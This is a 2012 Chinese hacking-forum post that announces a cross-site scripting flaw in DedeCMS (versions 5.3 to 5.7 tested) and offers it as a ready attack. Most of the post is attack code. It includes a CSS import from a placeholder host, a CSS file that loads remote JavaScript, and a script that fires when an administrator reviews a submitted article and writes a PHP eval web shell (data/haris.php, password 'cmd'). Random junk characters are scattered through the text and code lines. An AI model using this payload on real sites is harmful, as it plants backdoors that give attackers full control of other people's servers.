找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1754|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
  u: n8 k0 h) h- [: Y: O为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)* [! i9 B4 }+ i+ N3 `: m
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。1 A% b6 ]( s2 r: V8 U. h% r& Y
下面说说利用方法。
, [2 ?5 W1 H/ a$ S条件有2个:
( |3 _! u2 x3 f, {" f1.开启注册
0 M: q6 K0 j1 P8 U; @" }2.开启投稿+ z2 A& ?9 K( [2 ^5 u8 ]& Z
注册会员----发表文章
4 M6 E* h7 {  U内容填写:, [+ T1 J; [, U2 p, e6 ?
复制代码) u& _. _8 U/ V- k$ k# X
<style>@im\port'\http://xxx.com/xss.css';</style>
; B! d" `& u* f* Q) u+ M新建XSS.Css
+ s! P- g4 b; U8 d8 G; ^$ X3 b复制代码9 l' }0 ^' ]2 ?# T' r
.body{1 Q; E+ Y5 L! w' x& M4 ]$ J
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
# u) H# M  R) n* e! v新建xss.js 内容为: `" A: m# [. ?3 k, D: {7 P: ~
复制代码
2 v. v# T5 T" v1.var request = false;
; L3 W7 L1 y- ^' c/ t& e' X4 @2.if(window.XMLHttpRequest) {$ N2 G4 Z7 x& t4 r3 v( x5 F' ~
3.request = new XMLHttpRequest();& N+ j$ w: H4 Y/ Y& h
4.if(request.overrideMimeType) {
+ ~$ M# |/ g  c& k* C9 m. j2 b5.request.overrideMimeType('text/xml');4 ]7 Q9 k9 a$ |$ C. L6 v
6.}
) ?9 r; p4 X1 v; M, C7.} else if(window.ActiveXObject) {
( x) q& @; L& B6 H8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
0 Q+ Q& H! s- t# W; |  z9.for(var i=0; i<versions.length; i++) {0 o/ o% l5 p+ v5 _# |/ b
10.try {  m7 M$ ]$ M. n4 e# l9 A/ K
11.request = new ActiveXObject(versions);& {5 z" ?, ?2 H( W; D8 C
12.} catch(e) {}* S+ B/ ~$ g' g  ^
13.}4 d1 \1 i( o' M% [# }6 ?
14.}
9 k% E+ z  C! _0 g% t' Z15.xmlhttp=request;7 q* R' J" y# k$ i( A
16.function getFolder( url ){3 m% h6 \$ b' {( c0 G2 c* v! m) `; n
17. obj = url.split('/')
% T# ~7 \7 @4 ^2 ^1 |; a, i18. return obj[obj.length-2]
& [; [. }0 k+ W& K) Y7 \3 K" i) w19.}
  p  r; d4 D: L2 `  ~# D4 x* \20.oUrl = top.location.href;
% k- a" U# V3 h" J21.u = getFolder(oUrl);
8 m0 l0 s4 e  ~6 M22.add_admin();
8 F3 o  u% J2 t! N23.function add_admin(){
* `/ D3 I7 c' q* `$ _# R1 e( o24.var url= "/"+u+"/sys_sql_query.php";/ [) Z* x, |3 u. h
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";' ~; d" p2 n, V- }
26.xmlhttp.open("POST", url, true);. O4 l& M2 Z. ]1 h- M* g8 p$ y
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
: X$ K$ B( _8 ?- k28.xmlhttp.setRequestHeader("Content-length", params.length);
1 U+ d% d/ A9 b8 y; k# g: ?& d2 N29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
4 g# v& E9 n* {& O6 W$ }30.xmlhttp.send(params);
4 K0 k/ _' f3 |/ X' `. q: ?31.}
- Y) r9 T9 m; @' T7 w, Y当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表